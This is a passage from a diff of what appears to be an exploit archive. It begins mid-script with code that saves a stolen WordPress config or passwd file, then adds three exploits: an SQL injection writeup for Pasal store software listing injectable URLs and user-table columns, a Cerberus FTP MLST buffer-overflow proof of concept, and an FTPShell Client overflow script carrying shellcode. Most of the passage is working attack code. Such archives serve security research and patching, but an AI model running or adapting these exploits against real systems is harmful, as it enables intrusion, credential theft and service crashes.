if file_choice == "1":
|
||||||
|
resultFile=extract_hostname+"_config_"+cleanName+".txt"
|
||||||
|
print resultFile
|
||||||
|
pwned=open(resultFile, 'w')
|
||||||
|
pwned.write(respFromThatFile)
|
||||||
|
pwned.close
|
||||||
|
print "Wordpress Config Written to "+resultFile
|
||||||
|
else:
|
||||||
|
resultFile=extract_hostname+"_passwd"+cleanName+".txt"
|
||||||
|
pwned=open(resultFile, 'w')
|
||||||
|
pwned.write(respFromThatFile)
|
||||||
|
pwned.close
|
||||||
|
print "Passwd File Written to "+resultFile
|
||||||
|
else:
|
||||||
|
print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
checkPlugin()
|
29
platforms/php/webapps/41627.txt
Executable file
29
platforms/php/webapps/41627.txt
Executable file
|
@ -0,0 +1,29 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 17.03.2017
|
||||||
|
# Vendor Homepage: http://webstarslab.com
|
||||||
|
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
|
||||||
|
# Demo: http://webstarslab.com/departmental-store-management-system/store/
|
||||||
|
# Version: 1.2
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# Login as regular user
|
||||||
|
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
|
||||||
|
# tbl_users:id
|
||||||
|
# tbl_users:username
|
||||||
|
# tbl_users:password
|
||||||
|
# tbl_users:email
|
||||||
|
# tbl_users:full_name
|
||||||
|
# tbl_users:permission
|
||||||
|
# Etc..
|
||||||
|
# # # # #
|
50
platforms/windows/dos/41620.txt
Executable file
50
platforms/windows/dos/41620.txt
Executable file
|
@ -0,0 +1,50 @@
|
||||||
|
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
|
||||||
|
[+] Credits / Discovery: Nassim Asrir
|
||||||
|
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
|
||||||
|
[+] Author Company: Henceforth
|
||||||
|
[+] CVE: CVE-2017-6880
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
===============
|
||||||
|
|
||||||
|
https://www.cerberusftp.com/
|
||||||
|
|
||||||
|
|
||||||
|
Download:
|
||||||
|
===========
|
||||||
|
|
||||||
|
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
===================
|
||||||
|
|
||||||
|
Remote Buffer Overflow.
|
||||||
|
|
||||||
|
|
||||||
|
issue:
|
||||||
|
===================
|
||||||
|
|
||||||
|
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
|
||||||
|
|
||||||
|
POC:
|
||||||
|
===================
|
||||||
|
#Simple POC by Nassim Asrir from Henceforth.
|
||||||
|
import socket
|
||||||
|
bad_char = "A"*2047
|
||||||
|
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||||
|
connect=s.connect(('192.168.1.81',21))
|
||||||
|
s.recv(1024)
|
||||||
|
s.send('USER nassim\r\n')
|
||||||
|
s.recv(1024)
|
||||||
|
s.send('PASS mypass\r\n')
|
||||||
|
s.recv(1024)
|
||||||
|
s.send('MLST ' + bad_char + '\r\n')
|
||||||
|
s.close()
|
||||||
|
|
||||||
|
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
|
||||||
|
|
||||||
|
Tested on:
|
||||||
|
===============
|
||||||
|
|
||||||
|
Windows 7 Sp1 (64 Bit)
|
49
platforms/windows/dos/41629.py
Executable file
49
platforms/windows/dos/41629.py
Executable file
|
@ -0,0 +1,49 @@
|
||||||
|
print '''
|
||||||
|
|
||||||
|
##############################################
|
||||||
|
# Created: ScrR1pTK1dd13 #
|
||||||
|
# Name: Greg Priest #
|
||||||
|
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
|
||||||
|
##############################################
|
||||||
|
|
||||||
|
# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
|
||||||
|
# Date: 2017.03.17
|
||||||
|
# Exploit Author: Greg Priest
|
||||||
|
# Version: FTPShell Client 6.53
|
||||||
|
# Tested on: Windows7 x64 HUN/ENG Professional
|
||||||
|
'''
|
||||||
|
|
||||||
|
|
||||||
|
a = "A" * 460
|
||||||
|
b = '\xDC\xE8\x65\x76'
|
||||||
|
nop = '\x90' * 10
|
||||||
|
c = "C" * 1638
|
||||||
|
|
||||||
|
#calc.exe
|
||||||
|
shellcode =(
|
||||||
|
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
|
||||||
|
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
|
||||||
|
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
|
||||||
|
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
|
||||||
|
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
|
||||||
|
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
|
||||||
|
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
|
||||||
|
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
|
||||||
|
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
|
||||||
|
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
|
||||||
|
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
|
||||||
|
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
|
||||||
|
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
|
||||||
|
"\x53\x53\x53\x53\x52\x53\xff\xd7")
|
||||||
|
|
||||||
|
evilstring = a+b+nop+shellcode+c
|
||||||
|
|
||||||
|
|
||||||
|
file = open ('evilstring.txt', "w")
|
||||||
|
file.write(evilstring)
|
||||||
|
file.close
|
||||||
|
|
||||||
|
print evilstring
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Add table
Reference in a new issue